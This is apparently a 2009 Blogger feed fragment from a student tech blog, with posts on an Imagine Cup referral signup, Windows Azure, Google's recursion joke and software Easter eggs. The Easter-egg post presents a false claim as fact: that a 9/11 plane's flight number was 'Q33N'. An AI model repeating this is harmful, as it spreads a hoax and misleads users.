Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 5"&gt;   &lt;w:lsdexception locked="false" priority="60" semihidden="false" unhidewhenused="false" name="Light Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="61" semihidden="false" unhidewhenused="false" name="Light List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="62" semihidden="false" unhidewhenused="false" name="Light Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="63" semihidden="false" unhidewhenused="false" name="Medium Shading 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="64" semihidden="false" unhidewhenused="false" name="Medium Shading 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="65" semihidden="false" unhidewhenused="false" name="Medium List 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="66" semihidden="false" unhidewhenused="false" name="Medium List 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="67" semihidden="false" unhidewhenused="false" name="Medium Grid 1 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="68" semihidden="false" unhidewhenused="false" name="Medium Grid 2 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="69" semihidden="false" unhidewhenused="false" name="Medium Grid 3 Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="70" semihidden="false" unhidewhenused="false" name="Dark List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="71" semihidden="false" unhidewhenused="false" name="Colorful Shading Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="72" semihidden="false" unhidewhenused="false" name="Colorful List Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="73" semihidden="false" unhidewhenused="false" name="Colorful Grid Accent 6"&gt;   &lt;w:lsdexception locked="false" priority="19" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="21" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Emphasis"&gt;   &lt;w:lsdexception locked="false" priority="31" semihidden="false" unhidewhenused="false" qformat="true" name="Subtle Reference"&gt;   &lt;w:lsdexception locked="false" priority="32" semihidden="false" unhidewhenused="false" qformat="true" name="Intense Reference"&gt;   &lt;w:lsdexception locked="false" priority="33" semihidden="false" unhidewhenused="false" qformat="true" name="Book Title"&gt;   &lt;w:lsdexception locked="false" priority="37" name="Bibliography"&gt;   &lt;w:lsdexception locked="false" priority="39" qformat="true" name="TOC Heading"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Font Definitions */  @font-face 	{font-family:"Cambria Math"; 	panose-1:2 4 5 3 5 4 6 3 2 4; 	mso-font-charset:1; 	mso-generic-font-family:roman; 	mso-font-format:other; 	mso-font-pitch:variable; 	mso-font-signature:0 0 0 0 0 0;} @font-face 	{font-family:Calibri; 	panose-1:2 15 5 2 2 2 4 3 2 4; 	mso-font-charset:0; 	mso-generic-font-family:swiss; 	mso-font-pitch:variable; 	mso-font-signature:-1610611985 1073750139 0 0 159 0;}  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-unhide:no; 	mso-style-qformat:yes; 	mso-style-parent:""; 	margin-top:0in; 	margin-right:0in; 	margin-bottom:10.0pt; 	margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoChpDefault 	{mso-style-type:export-only; 	mso-default-props:yes; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-fareast-font-family:"Times New Roman"; 	mso-fareast-theme-font:minor-fareast; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin; 	mso-bidi-font-family:"Times New Roman"; 	mso-bidi-theme-font:minor-bidi;} .MsoPapDefault 	{mso-style-type:export-only; 	margin-bottom:10.0pt; 	line-height:115%;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.0in 1.0in 1.0in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin-top:0in; 	mso-para-margin-right:0in; 	mso-para-margin-bottom:10.0pt; 	mso-para-margin-left:0in; 	line-height:115%; 	mso-pagination:widow-orphan; 	font-size:11.0pt; 	font-family:"Calibri","sans-serif"; 	mso-ascii-font-family:Calibri; 	mso-ascii-theme-font:minor-latin; 	mso-hansi-font-family:Calibri; 	mso-hansi-theme-font:minor-latin;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p class="MsoNormal"&gt;&lt;b style=""&gt;&lt;br /&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;The software giant &lt;b style=""&gt;Microsoft&lt;/b&gt; is conducting a student.technology competition called "Imagine Cup 2010". There are lots of challenges/types of competition in this contest , I assure you will &lt;span style=""&gt; &lt;/span&gt;enjoy the contest .The registration method for the competition is mentioned below: &lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;b style=""&gt;COPY PASTE THE FOLLOWING LINK IN YOUR BROWSER&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;https://imaginecup.com/registration/default.aspx?EmailID=&amp;amp;ReferralCode=arkabhattacharya1990&amp;amp;DisplayName=&amp;amp;School &amp;amp;Country=India  &lt;!--[if !supportLineBreakNewLine]--&gt;  &lt;!--[endif]--&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;b style=""&gt;DO NOT&lt;/b&gt; CHANGE THE &lt;b style=""&gt;REFFERRAL CODE&lt;span style=""&gt;  &lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;Plz cross –check the &lt;b style=""&gt;referral code&lt;/b&gt; it shud be “&lt;b style=""&gt;arkabhattacharya1990&lt;/b&gt;” (without quotes)&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;Edit all your personal information , without changing the referral code .&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;Free softwares and &lt;b style=""&gt;&lt;span style="line-height: 115%;font-size:12pt;" &gt;ORIGINAL WINDOWS 7  DVDs at hefty discount WILL BE PROVIDED&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;span style=""&gt; &lt;/span&gt;Prizes for this competition include :&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;The top 3 finalists will receive a trip to the Worldwide Finals in&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;Warsaw, Poland.&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;Trip includes round trip coach airfare from major airport closest to&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;winners home, standard hotel accommodations, and select meals.&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;In addition, the top 3 finalists will receive one of the following cash prizes:&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;b style=""&gt;* First Place: $8,000 USD&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;* Second Place: $4,000 USD&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;* Third Place: $3,000 USD&lt;/b&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style=""&gt; &lt;/span&gt;And &lt;b style=""&gt;many more prizes&lt;/b&gt; yet other than this.Hope to see you all with prizes.&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;ARKA BHATTACHARYA&lt;/p&gt;  &lt;p class="MsoNormal"&gt;(MICROSOFT STUDENT PARTNER)&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;(for any enquiry about studentpartners program contact me at arkabhattacharya@student-partners.com)&lt;br /&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-8283416420512398050?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/8283416420512398050/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/11/microsoft-imagine-cup.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8283416420512398050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8283416420512398050'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/11/microsoft-imagine-cup.html' title='MICROSOFT IMAGINE CUP'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SxRK_pnVPNI/AAAAAAAAAMQ/lykzmd5IojU/s72-c/imagine+cup.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5062269052106772235</id><published>2009-08-01T06:21:00.000-07:00</published><updated>2009-08-01T06:35:40.678-07:00</updated><title type='text'>CAPTURING THE CLOUD</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/SnREoJkgWuI/AAAAAAAAAMI/TEUTtWrmYc8/s1600-h/windows-windows_azure_610x406.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 266px;" src="http://3.bp.blogspot.com/_T53992hHLOM/SnREoJkgWuI/AAAAAAAAAMI/TEUTtWrmYc8/s400/windows-windows_azure_610x406.jpg" alt="" id="BLOGGER_PHOTO_ID_5364988512659593954" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Azure Services&lt;br /&gt;The Windows® Azure™ Platform is an internet-scale cloud computing and services platform hosted in Microsoft data centers. The Windows Azure Platform provides a range of functionality to build applications that span from consumer web to enterprise scenarios and includes a cloud operating system and a set of developer services. Fully interoperable through the support of industry standards and web protocols such as REST and SOAP, you can use the Azure services individually or together, either to build new applications or to extend existing ones.&lt;br /&gt;Windows® Azure is a cloud services operating system that serves as the development, service hosting and service management environment for the Windows Azure Platform. Windows Azure provides developers with on-demand compute and storage to host, scale, and manage Web applications on the Internet through Microsoft® data centers.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Windows Azure is currently in Community Technology Preview. Commercial availability for Windows Azure will likely be at the end of calendar year 2009.&lt;br /&gt;&lt;br /&gt;Windows Azure is an open platform that will support both Microsoft and non-Microsoft languages and environments. To build applications and services on Windows Azure, developers can use their existing Microsoft® Visual Studio® 2008 expertise. In addition, Windows Azure supports popular standards and protocols including SOAP, REST, XML, and PHP.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5062269052106772235?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5062269052106772235/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/08/capturing-cloud.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5062269052106772235'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5062269052106772235'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/08/capturing-cloud.html' title='CAPTURING THE CLOUD'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_T53992hHLOM/SnREoJkgWuI/AAAAAAAAAMI/TEUTtWrmYc8/s72-c/windows-windows_azure_610x406.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6654683927481296726</id><published>2009-08-01T06:13:00.000-07:00</published><updated>2009-08-01T06:16:21.351-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>RECURSION IN GOOGLE</title><content type='html'>Google Goes Funny Again! Falls Intentionally In Recursion&lt;br /&gt;Google never fails to entertain us. This time when you search for Recursion on Google, it keeps on running spell check and displays Did you mean: recursion again and again.&lt;br /&gt;&lt;br /&gt;Recursion is the term usually used in Computer Science and this word generally means – to have a activity again and again, forever because the activity itself consist of same activity. It is like two mirrors facing each other and displaying infinite trail of opposite images.&lt;br /&gt;In recursion, the objects are repeated for infinite times. The iteration runs forever. Google displays this quality when you search for recursion.&lt;br /&gt;&lt;br /&gt;Despite of clicking on recursion from spell checker – Did you mean, Google will keep on displaying it. Though the spelling is right, Google keeps on telling it again and again.&lt;br /&gt;Try – http://www.google.com/search?hl=en&amp;q=recursion&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6654683927481296726?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6654683927481296726/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/08/recursion-in-google.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6654683927481296726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6654683927481296726'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/08/recursion-in-google.html' title='RECURSION IN GOOGLE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-8503182231770171915</id><published>2009-06-30T02:43:00.000-07:00</published><updated>2009-06-30T07:27:11.842-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>EASTER EGGS</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/Sknf8QhVBwI/AAAAAAAAAL4/jU7kIumN86s/s1600-h/Coloured_easter_eggs.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_T53992hHLOM/Sknf8QhVBwI/AAAAAAAAAL4/jU7kIumN86s/s400/Coloured_easter_eggs.jpg" alt="" id="BLOGGER_PHOTO_ID_5353055858426447618" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.fullpost 	{mso-style-name:fullpost;} span.klink 	{mso-style-name:klink;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;What are Easter eggs ? You  mite probably answer “ they are huge sugar laced eggs filled with chocolates or sweets that would be hidden by&lt;span style=""&gt;  &lt;/span&gt;elders as a surprise during Easter time”&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;However in technical jargon ‘Easter eggs is something different .Wikipedia now defines it in this way “An Easter egg is an unintentional hidden message joke or a feature in a object movie ,book cd,dvd web page or a computer program”&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;Well&lt;span style=""&gt;  &lt;/span&gt;c the last word of the above paragraph’ computer program’ .Yeah that inspired me to do a bit of research in Easter eggs hidden in computer programs .Most people think of computer engineers as serious geeks for whom Windows is even more important than well eh… wife(sorry bad joke).Nah all of them are not like that ..at least I am not like that..Well getting back to the point many coders have put great jokes up there sleeves into their programs ..its now for us to discover them..&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;The first easter egg I found&lt;span style=""&gt;  &lt;/span&gt;was present in Windows 97 .if u type “Bill Clinton” and press Shift+F7&lt;span style=""&gt;  &lt;/span&gt;an UK Thesaurus dialogue box comes upon screen with a synonym “I would like to see her naked” .This was at the height of Monica Lewinsky scandal. To get this joke you must set your language setting in Word 97 to UK English.&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;Here is another one that works in almost every version of Word. Just type “=rand(5,10)” and press enter .You l get 10 paragraphs with 5 sentences each &lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;Open word and type anything anything.Now select whatever you hav written and press control alt-+ and see the cursor change &lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;There are a lot of easter eggs hidden in the web Browser Mozilla Firefox too .lets see some of them type in ‘&lt;i style=""&gt;about:mozilla&lt;/i&gt;’ and just see the magic&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/SknekOzd68I/AAAAAAAAALw/NQzu3KcI9ws/s1600-h/moziila.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 130px;" src="http://1.bp.blogspot.com/_T53992hHLOM/SknekOzd68I/AAAAAAAAALw/NQzu3KcI9ws/s400/moziila.png" alt="" id="BLOGGER_PHOTO_ID_5353054346137168834" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;Or type in &lt;i style=""&gt;‘about:robots’&lt;/i&gt; and hold &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;ur&lt;/st1:city&gt;&lt;/st1:place&gt; breath …I wont say find it out yourself&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;or type '&lt;span style="font-style: italic;"&gt;about: : rights&lt;/span&gt;'  n see for yourself&lt;br /&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;span class="fullpost"&gt;Did you know that the flight number of the plane that had hit WTC ...on&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;9/11 was Q33N ....Open your Notepad in &lt;st1:place st="on"&gt;&lt;st1:city st="on"&gt;ur&lt;/st1:city&gt;&lt;/st1:place&gt; &lt;/span&gt;&lt;span class="klink"&gt;&lt;span style=";font-family:Arial;font-size:10;"  &gt;computer&lt;/span&gt;&lt;/span&gt;&lt;span class="fullpost"&gt;&lt;span style="font-size:10;"&gt; &lt;/span&gt;and type the flight&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;number i.e Q33N... Increase the Font Size to 72, Change the Font to&lt;/span&gt;&lt;br /&gt;&lt;span class="fullpost"&gt;Wingdings. U will be amazed by the findings.&lt;/span&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;Here is a cool notepad secret type “Bush hid the facts “ in a notepad file and save it .then re-open it Whew!!where has the text gone &lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;There are many other Easter eggs in other program .for example you can cheat and win in solitaire by pressing simultaneously Alt- Shift and 2 .&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;However one of the best is this one .navigate to www.yahoo.com. Make sure the speakers re on .Click on the dot under the exclamation mark of the mast head of Yahoo! .Enjoy&lt;/p&gt;&lt;p style="font-weight: bold;" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;span style="font-weight: bold;"&gt;if you find any more such hidden tricks don forget to add in the comments sections &lt;/span&gt;&lt;br /&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-8503182231770171915?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/8503182231770171915/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/06/easter-eggs.html#comment-form' title='3 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8503182231770171915'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/8503182231770171915'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/06/easter-eggs.html' title='EASTER EGGS'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/Sknf8QhVBwI/AAAAAAAAAL4/jU7kIumN86s/s72-c/Coloured_easter_eggs.jpg' height='72' width='72'/><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4203231134419534466</id><published>2009-06-27T08:26:00.000-07:00</published><updated>2009-06-27T08:35:57.477-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>CD VS DVD</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SkY6tF5_MII/AAAAAAAAALg/OdL8Gr27620/s1600-h/large.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 321px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SkY6tF5_MII/AAAAAAAAALg/OdL8Gr27620/s400/large.jpg" alt="" id="BLOGGER_PHOTO_ID_5352029753530331266" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" 